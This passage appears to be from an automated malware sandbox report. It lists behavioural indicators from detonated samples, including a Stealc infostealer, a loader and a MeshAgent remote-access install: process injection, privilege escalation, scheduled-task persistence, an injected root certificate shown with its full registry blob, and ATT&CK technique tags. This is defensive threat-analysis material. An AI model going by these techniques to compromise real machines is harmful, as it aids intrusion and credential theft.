File opened for modification	C:\Windows\SysWOW64\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0E846CB359894C6864CA8701C27A9697FB256856	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\43573B473F619378ADA4F2BD172686ED7BE061F6	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wrpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0E846CB359894C6864CA8701C27A9697FB256856	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\5B1EE8BDD6D02B5D398F42B834595FFFE1F063AD	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\exe\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ole32.pdb	MeshAgent.exe

Enumerates processes with tasklist 1 TTPs 9 IoCs

discovery

Process Discovery

T1057

pid	Process
13484	Process not Found
29992	Process not Found
33544	Process not Found
36984	Process not Found
53976	Process not Found
15432	tasklist.exe
20224	Process not Found
9156	Process not Found
37912	Process not Found

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 2752 set thread context of 4380	2752	3544436.exe	84
PID 2220 set thread context of 1484	2220	76y5trfed675ytg.exe	101
PID 1484 set thread context of 2204	1484	iexplore.exe	106
PID 4088 set thread context of 5008	4088	j4vzzuai.exe	119
PID 2380 set thread context of 5404	2380	Cbmefxrmnv.exe	145
PID 3920 set thread context of 2644	3920	crypted.exe	187
PID 5820 set thread context of 1072	5820	hwbpwd.exe	206
PID 5928 set thread context of 4116	5928	needmoney.exe	231

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab8e-15663.dat	upx
behavioral1/memory/18992-15695-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral1/files/0x001100000002b492-29480.dat	upx
behavioral1/files/0x000d00000002b96e-32597.dat	upx

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.gif	wow.exe
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.htm	wow.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.exe	meshagent32-group.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\sysppvrdnvs.exe	tdrpload.exe
File created	C:\Windows\sysvplervcs.exe	m.exe
File opened for modification	C:\Windows\sysvplervcs.exe	m.exe
File created	C:\Windows\Tasks\Test Task17.job	Cbmefxrmnv.exe
File created	C:\Windows\sysppvrdnvs.exe	tdrpload.exe

Launches sc.exe 25 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3116	sc.exe
3540	sc.exe
3792	sc.exe
6308	sc.exe
13260	sc.exe
11456	sc.exe
2352	sc.exe
6080	sc.exe
50872	Process not Found
2012	Process not Found
8976	Process not Found
26480	Process not Found
19888	Process not Found
51076	Process not Found
2508	sc.exe
5072	Process not Found
4488	sc.exe
50716	Process not Found
51180	Process not Found
48140	Process not Found
4672	sc.exe
3128	sc.exe
8184	sc.exe
4432	sc.exe
6108	sc.exe

Access Token Manipulation: Create Process with Token 1 TTPs 3 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
5924	mshta.exe
37412	Process not Found
56968	Process not Found

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000d00000002b7db-31082.dat	pyinstaller

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral1/files/0x000300000000068d-5470.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 12 IoCs

pid	pid_target	Process	procid_target
3528	4088	WerFault.exe	115
3864	792	WerFault.exe	289
13332	8372	WerFault.exe	801
19600	17640	WerFault.exe	1024
14920	23980	Process not Found	1486
14440	11764	Process not Found	1729
16292	18320	Process not Found	1719
23744	18128	Process not Found	1941
29572	22276	Process not Found	949
32600	31412	Process not Found	2037
41256	40136	Process not Found	2227
50820	14780	Process not Found	1323

System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cbmefxrmnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypted.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3544436.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Runtime Broker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	m.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Installeraus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tdrpload.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTallowedtocrypt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	685410430.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	needmoney.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	247805573.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kmvcsaed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AV_DOW~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysvplervcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3132929399.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hwbpwd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	meshagent32-group.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wow.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hwbpwd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	av_downloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	76y5trfed675ytg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	j4vzzuai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoodFrag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	j4vzzuai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wwbizsrvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cbmefxrmnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 25 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5608	PING.EXE
12432	Process not Found
13592	Process not Found
29824	Process not Found
23032	PING.EXE
24288	Process not Found
27528	Process not Found
28496	Process not Found
34408	Process not Found
51104	Process not Found
53372	Process not Found
42648	Process not Found
16860	PING.EXE
27316	PING.EXE
19744	Process not Found
6580	Process not Found
24360	Process not Found
32772	Process not Found
34560	Process not Found
53792	Process not Found
15960	PING.EXE
23464	PING.EXE
6732	Process not Found
25408	Process not Found
46884	Process not Found

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
1320	netsh.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x000200000002a4c6-26504.dat	nsis_installer_1
behavioral1/files/0x000200000002a4c6-26504.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost015.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost015.exe

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
3024	timeout.exe
3152	timeout.exe
26188	Process not Found
11132	Process not Found
32336	Process not Found
36180	Process not Found

Discovers systems in the same network 1 TTPs 64 IoCs

discovery

Remote System Discovery

T1018

pid	Process
56064	Process not Found
30248	Process not Found
44540	Process not Found
50536	Process not Found
36368	Process not Found
55500	Process not Found
55300	Process not Found
55536	Process not Found
55628	Process not Found
53672	Process not Found
44512	Process not Found
48920	Process not Found
49744	Process not Found
53328	Process not Found
45040	Process not Found
52608	Process not Found
49108	Process not Found
54852	Process not Found
48692	Process not Found
56460	Process not Found
58860	Process not Found
55524	Process not Found
44752	Process not Found
44296	Process not Found
51636	Process not Found
51980	Process not Found
52408	Process not Found
39888	Process not Found
43916	Process not Found
44948	Process not Found
44680	Process not Found
51212	Process not Found
58620	Process not Found
48904	Process not Found
56788	Process not Found
44380	Process not Found
55896	Process not Found
48060	Process not Found
46780	Process not Found
54496	Process not Found
58868	Process not Found
45052	Process not Found
48004	Process not Found
37816	Process not Found
48104	Process not Found
47720	Process not Found
53096	Process not Found
54452	Process not Found
44764	Process not Found
44492	Process not Found
48616	Process not Found
48216	Process not Found
53344	Process not Found
54192	Process not Found
50432	Process not Found
44432	Process not Found
59092	Process not Found
57604	Process not Found
29852	Process not Found
44496	Process not Found
28616	Process not Found
47084	Process not Found
44468	Process not Found
44552	Process not Found

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
29988	Process not Found

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
14344	Process not Found

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133765561231396946"	MeshAgent.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	NOTallowedtocrypt.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2584844841-1405471295-1760131749-1000\{F2FB2D1C-300C-48D6-B1FD-EE5CCF247C74}	svchost.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
480	reg.exe
18404	Process not Found
22060	Process not Found
54820	Process not Found
2740	reg.exe
3836	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Runs ping.exe 1 TTPs 25 IoCs

Remote System Discovery

T1018

pid	Process
32772	Process not Found
42648	Process not Found
53792	Process not Found
5608	PING.EXE
12432	Process not Found
24288	Process not Found
27528	Process not Found
6580	Process not Found
25408	Process not Found
13592	Process not Found
24360	Process not Found
34408	Process not Found
34560	Process not Found
51104	Process not Found
15960	PING.EXE
27316	PING.EXE
19744	Process not Found
28496	Process not Found
46884	Process not Found
53372	Process not Found
16860	PING.EXE
23464	PING.EXE
23032	PING.EXE
6732	Process not Found
29824	Process not Found

Scheduled Task/Job: Scheduled Task 1 TTPs 50 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
55144	Process not Found
57240	Process not Found
59268	Process not Found
58972	Process not Found
55512	Process not Found
1708	schtasks.exe
20768	schtasks.exe
40480	Process not Found
58792	Process not Found
56864	Process not Found
59336	Process not Found
54872	Process not Found
3348	Process not Found
56880	Process not Found
40084	Process not Found
56672	Process not Found
58248	Process not Found
10148	schtasks.exe
56716	Process not Found
57364	Process not Found
56844	Process not Found
56344	Process not Found
58444	Process not Found
54252	Process not Found
53664	Process not Found
1008	schtasks.exe
56332	Process not Found
56636	Process not Found
58240	Process not Found
7768	Process not Found
56964	Process not Found
57824	Process not Found
55444	Process not Found
56580	Process not Found
56792	Process not Found
57024	Process not Found
57104	Process not Found
55888	Process not Found
57556	Process not Found
59280	Process not Found
55888	Process not Found
56504	Process not Found
56552	Process not Found
57296	Process not Found
59248	Process not Found
58176	Process not Found
4464	Process not Found
20064	Process not Found
56420	Process not Found
57160	Process not Found

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	16055	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
3380	powershell.exe
3380	powershell.exe
2428	powershell.exe
2428	powershell.exe
3532	powershell.exe
3532	powershell.exe
2220	76y5trfed675ytg.exe
2220	76y5trfed675ytg.exe
456	stealc_default.exe
456	stealc_default.exe
1736	powershell.exe
1736	powershell.exe
1736	powershell.exe
2484	wwbizsrvs.exe
2484	wwbizsrvs.exe
5576	2232519369.exe
5576	2232519369.exe
6064	powershell.exe
6064	powershell.exe
6064	powershell.exe
5376	2014831613.exe
5376	2014831613.exe
2848	msedge.exe
2848	msedge.exe
5564	msedge.exe
5564	msedge.exe
892	powershell.exe
892	powershell.exe
892	powershell.exe
5376	2014831613.exe
5376	2014831613.exe
4116	svchost015.exe
4116	svchost015.exe
4896	identity_helper.exe
4896	identity_helper.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1484	iexplore.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2220	76y5trfed675ytg.exe
1484	iexplore.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2004	4363463463464363463463463.exe
Token: SeDebugPrivilege	32	XClient.exe
Token: SeDebugPrivilege	4380	MSBuild.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeDebugPrivilege	32	XClient.exe
Token: 33	1624	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1624	AUDIODG.EXE
Token: SeDebugPrivilege	1468	Runtime Broker.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	4820	Wave.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: SeBackupPrivilege	2484	wwbizsrvs.exe
Token: SeRestorePrivilege	2484	wwbizsrvs.exe
Token: SeDebugPrivilege	2380	Cbmefxrmnv.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: SeDebugPrivilege	2380	Cbmefxrmnv.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: SeDebugPrivilege	5576	2232519369.exe
Token: SeDebugPrivilege	5800	Wave.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: SeDebugPrivilege	5820	hwbpwd.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: 33	1468	Runtime Broker.exe
Token: SeIncBasePriorityPrivilege	1468	Runtime Broker.exe
Token: SeDebugPrivilege	6064	powershell.exe
Token: SeDebugPrivilege	5820	hwbpwd.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeIncreaseQuotaPrivilege	892	powershell.exe
Token: SeSecurityPrivilege	892	powershell.exe
Token: SeTakeOwnershipPrivilege	892	powershell.exe
Token: SeLoadDriverPrivilege	892	powershell.exe
Token: SeSystemProfilePrivilege	892	powershell.exe
Token: SeSystemtimePrivilege	892	powershell.exe
Token: SeProfSingleProcessPrivilege	892	powershell.exe
Token: SeIncBasePriorityPrivilege	892	powershell.exe
Token: SeCreatePagefilePrivilege	892	powershell.exe
Token: SeBackupPrivilege	892	powershell.exe
Token: SeRestorePrivilege	892	powershell.exe
Token: SeShutdownPrivilege	892	powershell.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeSystemEnvironmentPrivilege	892	powershell.exe
Token: SeRemoteShutdownPrivilege	892	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe
5564	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1484	iexplore.exe
1556	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 32	2004	4363463463464363463463463.exe	81
PID 2004 wrote to memory of 32	2004	4363463463464363463463463.exe	81
PID 2004 wrote to memory of 2752	2004	4363463463464363463463463.exe	82
PID 2004 wrote to memory of 2752	2004	4363463463464363463463463.exe	82
PID 2004 wrote to memory of 2752	2004	4363463463464363463463463.exe	82
